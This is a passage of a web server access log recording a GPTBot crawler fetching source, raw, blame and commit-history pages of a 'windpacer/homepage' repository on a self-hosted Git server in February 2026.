AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" -[17/Feb/2026:13:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" -[17/Feb/2026:13:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 74.7.227.38] [Length 10342] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" -[17/Feb/2026:13:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 74.7.227.38] [Length 11889] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services" -[17/Feb/2026:13:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" -[17/Feb/2026:13:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 74.7.227.38] [Length 10352] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" -[17/Feb/2026:13:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" -[17/Feb/2026:13:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" -[17/Feb/2026:13:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" -[17/Feb/2026:13:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 74.7.227.38] [Length 10826] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" -[17/Feb/2026:13:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 74.7.227.38] [Length 10729] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" -[17/Feb/2026:13:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 74.7.227.38] [Length 10780] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" -[17/Feb/2026:13:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" -[17/Feb/2026:13:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" -[17/Feb/2026:13:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" -[17/Feb/2026:13:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 74.7.227.38] [Length 11207] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" -[17/Feb/2026:13:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" -[17/Feb/2026:13:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" -[17/Feb/2026:13:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" -[17/Feb/2026:13:04:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" -[17/Feb/2026:13:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" -[17/Feb/2026:13:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 146722] [Gzip 20.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" -[17/Feb/2026:13:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 4568343] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" -[17/Feb/2026:13:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" -[17/Feb/2026:13:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 74.7.227.38] [Length 1659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" -[17/Feb/2026:13:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" [Client 74.7.227.38] [Length 10381] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" [Client 74.7.227.38] [Length 10760] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" -[17/Feb/2026:13:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 10838] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:13:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 10885] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" -[17/Feb/2026:13:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:13:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" -[17/Feb/2026:13:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 74.7.227.38] [Length 10729] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" -[17/Feb/2026:13:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 74.7.227.38] [Length 31013] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 74.7.227.38] [Length 12414] [Gzip 5.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" -[17/Feb/2026:13:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 74.7.227.38] [Length 4668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" -[17/Feb/2026:13:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" [Client 74.7.227.38] [Length 10074] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" -[17/Feb/2026:13:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" -[17/Feb/2026:13:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" -[17/Feb/2026:13:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 146722] [Gzip 20.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" -[17/Feb/2026:13:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 9870] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:13:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 18325] [Gzip 6.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:13:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 74.7.227.38] [Length 15578] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" -[17/Feb/2026:13:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 74.7.227.38] [Length 10760] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" -[17/Feb/2026:13:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 74.7.227.38] [Length 10325] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" -[17/Feb/2026:13:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 74.7.227.38] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" -[17/Feb/2026:13:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" -[17/Feb/2026:13:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:13:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" [Client 74.7.227.38] [Length 14306] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 24507] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js" -[17/Feb/2026:13:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 18119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" -[17/Feb/2026:13:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 10806] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" -[17/Feb/2026:13:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" [Client 74.7.227.38] [Length 13813] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:13:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" [Client 74.7.227.38] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 74.7.227.38] [Length 11262] [Gzip 